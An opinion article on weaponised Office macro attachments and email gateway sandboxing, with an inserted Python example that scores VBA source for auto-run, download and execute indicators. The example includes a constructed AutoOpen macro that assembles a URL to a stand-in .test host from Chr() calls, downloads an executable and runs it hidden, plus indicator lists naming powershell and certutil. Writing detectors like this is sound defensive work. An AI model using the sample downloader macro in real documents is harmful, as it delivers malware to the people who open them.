Hackers, attackers and cybercriminals are no slouches when it comes to staying on the cutting edge of the tools of their trade. The black hats that seek to exploit our networks, applications and users are inventive and excellent problem solvers when it comes to finding new ways to break into our systems.
The white hats that seek to defend us often lament that hackers only need to be good at the job once to be a success, whereas security pros need to be good every day. We often cite the ‘arms race’ or The Red Queen Effect when it comes to staying ahead of the creativity of the hackers. Standing still for any length of time will not serve you well in this race.
Indeed, anyone who hasn’t taken a fresh look at their email security infrastructure in the last eighteen months is likely to be behind the curve here. Given that rate of advancement of threats to our email security, relying on your last upgrade, ‘a couple of years ago’ means you’re highly likely to be out of date in terms of protection.
The best example of this, and probably the biggest threat to email security right now, is the rise of VBA macros used to build weaponised Office attachments: the macro itself carries out, or fetches, the malicious action. Hackers and cybercriminals are great experimenters and know exactly what types of protection are used to defeat their malware.
They even download and run freely available trials of the on-premises email security products to work out how to circumvent their protections. It is from this ‘reverse-engineering’ that they have learned how to avoid classic signature detection, which looks for known malicious code or traces of malware embedded in attachments, and have graduated to using macros embedded in Office documents to do the dirty work for them.
The trap here is obvious: a weaponised attachment with a malicious macro contains no ‘viral payload’ of its own; it becomes dangerous only when the end user opens the attachment, the macro runs and the malware is downloaded. Luckily, modern versions of the Office applications disable macros by default, but that does not stop administrators re-enabling them as a default, nor does it help the legions of office users running software that pre-dates the feature.
Using VBA macros within Office document attachments is a real demonstration of the ingenuity and dedication of cybercriminals. It shows us why we shouldn’t rely on technology that hasn’t been upgraded for a few years.
So what do we do? If classic signature-based detection is ineffective, if hackers are evading the legacy secure email gateway and desktop anti-virus, and if employees are at risk of infecting themselves with innocent-looking Office files, what is the solution?
Network sandboxing isn’t a new technology, it’s one that’s been used in desktop antivirus for many years; Norman AS brought the concept to the enterprise desktop a couple of decades ago and it’s been around on the network since. Recently the sandbox has also been applied to the SMTP secure email gateway, albeit with a latency overhead. It’s here that we can start to unpack the problem of hidden macro code in attachments.
Without an email attachment sandbox, weaponised attachments pass straight through a classic secure email gateway: there is no malicious code in them to trigger a signature. A URL alone within the macro, obfuscated in that code and unique to that attachment, poses no risk in itself until the macro is executed. This is where adding an SMTP gateway sandbox to your security stack helps defend against the macro threat.
Executing, exploding, detonating and other dramatic phrases are how we describe what the sandbox does. In short, it simply runs the attachment in an instrumented environment and looks for anomalous behaviour. For example, if the sandbox opens an Excel spreadsheet that a user has been sent as an attachment and, when run, the macro calls out to a remote web server to download a ZIP or executable file, we can safely assume that is not normal behaviour.
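The pattern a sandbox catches dynamically (an auto-running macro that resolves an obfuscated URL, downloads a file and executes it) can also be triaged statically before the attachment is queued for detonation, which helps with the latency overhead mentioned above. The following is an added example and not code from the article or from any product it mentions: a small Python scorer over extracted VBA source that undoes `Chr()` and `"a" & "b"` string building, then looks for auto-execute entry points, download/execute APIs and URLs. The macro text, the indicator lists and the `.test` domain are all constructed for the example; in practice the source would come from a VBA extractor run on the attachment.

```python
"""Static triage of VBA macro source for the weaponised-attachment pattern.

Added example (not from the original article). It does not parse .docm/.xlsm
files; it takes VBA source text as a string, e.g. as produced by a macro
extractor, and returns findings a gateway could use to prioritise sandboxing.
"""
import re

# Procedure names Office runs automatically on open (constructed list).
AUTO_EXEC = {"autoopen", "auto_open", "autoexec", "document_open",
             "workbook_open", "workbook_activate"}

# APIs / COM objects commonly used to fetch and run a second stage
# (constructed list, mapped to the kind of behaviour they indicate).
DOWNLOAD_EXEC = {
    "urldownloadtofile": "download", "msxml2.xmlhttp": "download",
    "microsoft.xmlhttp": "download", "winhttp.winhttprequest": "download",
    "certutil": "download", "adodb.stream": "write-to-disk",
    "wscript.shell": "execute", "shell": "execute",
    "powershell": "execute", "cmd.exe": "execute",
}

CHR_RE = re.compile(r'Chr[WB]?\(\s*(\d+)\s*\)', re.IGNORECASE)
# `"ab" & "cd"` (optionally with a ` _` line continuation) -> `"abcd"`
JOIN_RE = re.compile(r'"\s*&\s*(?:_\s*)?"')
URL_RE = re.compile(r'https?://[\w.\-/:%?=&]+', re.IGNORECASE)


def deobfuscate(vba: str) -> str:
    """Turn Chr(n) calls into quoted characters and merge concatenations.

    Only the simplest tricks are handled; Chr(34) (a double quote) is left
    as a literal quote and would need VBA's "" escaping in a full tool.
    """
    out = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', vba)
    prev = None
    while prev != out:          # repeat until no adjacent literals remain
        prev = out
        out = JOIN_RE.sub("", out)
    return out


def _present(token: str, text: str) -> bool:
    """Whole-token match so 'shell' is not found inside 'shellfish'."""
    return re.search(r'(?<!\w)' + re.escape(token) + r'(?!\w)', text) is not None


def analyse(vba: str) -> dict:
    """Score one macro: auto-run entry point + download/execute = suspicious."""
    clean = deobfuscate(vba)
    lowered = clean.lower()
    auto_exec = sorted(n for n in AUTO_EXEC if _present(n, lowered))
    indicators = sorted({kind for api, kind in DOWNLOAD_EXEC.items()
                         if _present(api, lowered)})
    urls = sorted(set(URL_RE.findall(clean)))
    suspicious = bool(auto_exec) and bool({"download", "execute"} & set(indicators))
    return {"auto_exec": auto_exec, "indicators": indicators,
            "urls": urls, "suspicious": suspicious}


# Constructed sample: downloader macro with the URL built from Chr() pieces.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String, p As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://" & "files.example" & _
        ".test/" & "inv" & "oice.exe"
    p = Environ("TEMP") & "\upd.exe"
    URLDownloadToFile 0, u, p, 0, 0
    Shell p, vbHide
End Sub
'''

# Constructed sample: a harmless formatting macro for comparison.
BENIGN_MACRO = r'''
Sub FormatReport()
    ActiveSheet.Range("A1:D20").Font.Bold = True
    ActiveSheet.Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, analyse(src))
```

A positive result here does not replace detonation; it is a cheap reason to send the attachment to the sandbox first, while a clean result on a macro that only calls `CreateObject` with a string assembled at runtime is exactly the case where only execution will tell you what the URL is.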
Now is the time to review the layers of protection you have in place against weaponised attachments. Adding a gateway sandbox is the latest advancement in security that you need to consider in order to remain protected against advanced threats.
Have an opinion on security? Want to have your articles published on CSO? Please contact CSO Content Manager for our guidelines.